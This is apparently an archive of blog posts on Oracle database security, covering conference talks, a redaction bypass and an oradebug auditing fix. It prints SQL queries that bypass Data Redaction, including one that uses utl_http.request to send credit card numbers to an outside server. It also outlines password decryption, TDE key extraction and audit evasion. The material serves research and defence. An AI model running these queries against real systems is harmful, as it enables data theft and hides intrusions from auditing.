Archive for the ‘11g’ Category

Best of Oracle Security 2013

Freitag, November 22nd, 2013

I just uploaded my DOAG 2013 presentation „Best of Oracle Security 2013„.


This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, Hide information from Oracle Auding using VPD and more…


SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);

ERROR at line 1:

ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at „ORDSYS.ORDERROR“, line 5
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 1394
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 479
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 8232
ORA-06512: at „ORDSYS.ORD_DICOM“, line 756
ORA-06512: at line 1




select * from credit_card where 1=length(utl_http.request(‚’||card_id));

==> bypassing the obfuscation because the utl_http.request is located in the where clause


——– output from access.log ———— – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] „GET /1234-1234-1234-1234 HTTP/1.1″ 404 35 – – – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] „GET /5678-5678-5678-5678 HTTP/1.1″ 404 35 – –

——– output from access.log ————



Decrypt Oracle and database link passwords

Mittwoch, Oktober 2nd, 2013

At Derbycon 3.0, László Tóth and Ferenc Spala  gave a a new presentation „What’s common in Oracle and Samsung? They tried to think differently… “ (Video). The main focus of the presentation was the Samsung encryption and a new framework called sandy but there was also a small Oracle part.

Laszlo and Ferenc showed how to decrypt Oracle database links in Oracle and Oracle using a small utility called „“. In previous versions Oracle used DES to encrypt/decrypt database links. These database link passwords start with „05“ (Oracle’s indicator for DES).


Fix for oradebug disable auditing available (

Freitag, September 13th, 2013

2 days ago I gave a presentation „Oracle 12c from the attackers perspective“ at the DOAG SIG Security. I learned some interesting things, especially that a fix for the Oracle oradebug „disable auditing“ problem is available since 9 months.

Oradebug allows to run OS commands and to enable/disable Oracle SYSDBA and normal auditing on the fly without leaving traces in the audit log. The fix for this problem is available in Oracle and was backported to using the patches 15805002, 15808245, 16177780.

By default the setting is not enabled in Oracle

The undocumented parameter  _fifteenth_spare_parameter (Oracle Description: fifteenth spare parameter – integer – Yeah, really useful)  can now disable or limit the oradebug functionality. I could not find any information about this parameter on google or my oracle support.

—— extract from the read me.txt of the patch file——————

## _fifteenth_spare_parameter can be set to „all“, „restricted“ or „none“
## „all“ disables execution of all oradebug commands, „restricted“ disables
## execution of restricted oradebug commands, „none“ (default) allows execution
## of oradebug commands.

—— extract from the read me.txt ——————



DOAG 2012: Best of Oracle Security 2012

Donnerstag, November 22nd, 2012

Yesterday I gave a presentation „Best of Oracle Security 2012“ at the DOAG 2012 conference in Nürnberg.

Best of Oracle Security

Laszlo’s presentation „Oracle Post Exploitation Techniques“ and Marcel’s Sybase ASE Password Cracker

Dienstag, September 21st, 2010

Last weekend I gave a presentation „Security comparison of different databases“ (Oracle, MySQL, MSSQL, DB2 LUW, PostgreSQL and Sybase ASE) at the Hacktivity 2010 conference in Budapest. A blog entry dedicated to this will be released soon.

I saw Laszlo’s presentation „Oracle post exploitation techniques“ and got even a private sneak preview of his presentation in English 1 day before.

Laszlo talked about very very interesting things (at least for me) and I personally think that this is one of the best Oracle security research papers I know. Also some paranoid customers have to rethink their security architecture because this research affects DB Vault and Oracle TDE as well (every OS user can see every cleartext password during the logon process).

  • Decrypt the Enterprise Manager/Grid Control passwords in newer version.
    The simple way using sysman.decrypt() no longer works in newer version of Oracle. But his approach is reading the key from the file emkey.ora and using sysman.mgmt_time_sync to set the key. This works in new versions as well.
  • DLL injection:
    A malicious OS user (e.g. DBA or Unix root) on the database server can intercept the cleartext password on the database server during logon. He showed working examples running on Windows and Linux (!!!)
  • Decrypt TDE encrypted data and extract the TDE masterkey from the Oracle wallet
  • Analysis of the Oracle 11g Remote Job Scheduling.

The second really good presentation was from Marcell Major about reversing password algorithms. He showed different ways how to perform this and showed how he did this for Sybase ASE database passwords. Especially the old SYS-PROP based on a FEAL algorithm was really impressive. But this presentation is currently not online.

Marcell already released the password cracker for new Sybase ASE SHA256 algorithm.

Our new Repscan 4.0 supports now Sybase ASE, PostgreSQL and Microsoft SQL Azure and can crack all these passwords .